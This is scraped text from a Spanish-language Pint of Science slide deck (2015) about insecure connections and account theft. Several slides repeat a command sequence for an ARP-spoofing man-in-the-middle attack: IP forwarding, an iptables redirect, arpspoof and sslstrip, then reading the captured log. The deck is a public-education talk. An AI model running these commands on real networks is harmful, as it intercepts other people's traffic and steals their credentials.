Más contenido relacionado Similar a Pint Of Science - Donostia - San Sebastian (20) Pint Of Science - Donostia - San Sebastian1. Conexiones inseguras y robo de
cuentas
Ni Neu, 20 de mayo 2015
Julián Estévez
@jeibros
http://www.ideasecundaria.blogspot.com
2. • echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
4. • echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
6. • echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables –t nat –A PREROUTING –p tcp --destination-
port 80 –j REDIRECT --to-port 8080
• arpspoof –i <interface> -t <target IP> -r <gateway IP>
• sslstrip –l 8080
• cat sslstrip.log
Código
9. -El usuario cree que en red WPA está seguro
-HTTPS
Afortunadamente…
- Gmail y Facebook están protegidos frente a
SSLStrip
Pero…
- No están seguros frente a otros ataques
como SSLSplit, robo de cookie e ingeniería
social
11. Conexiones inseguras y robo de
cuentas
Ni Neu, 20 de mayo 2015
Julián Estévez
@jeibros
http://www.ideasecundaria.blogspot.com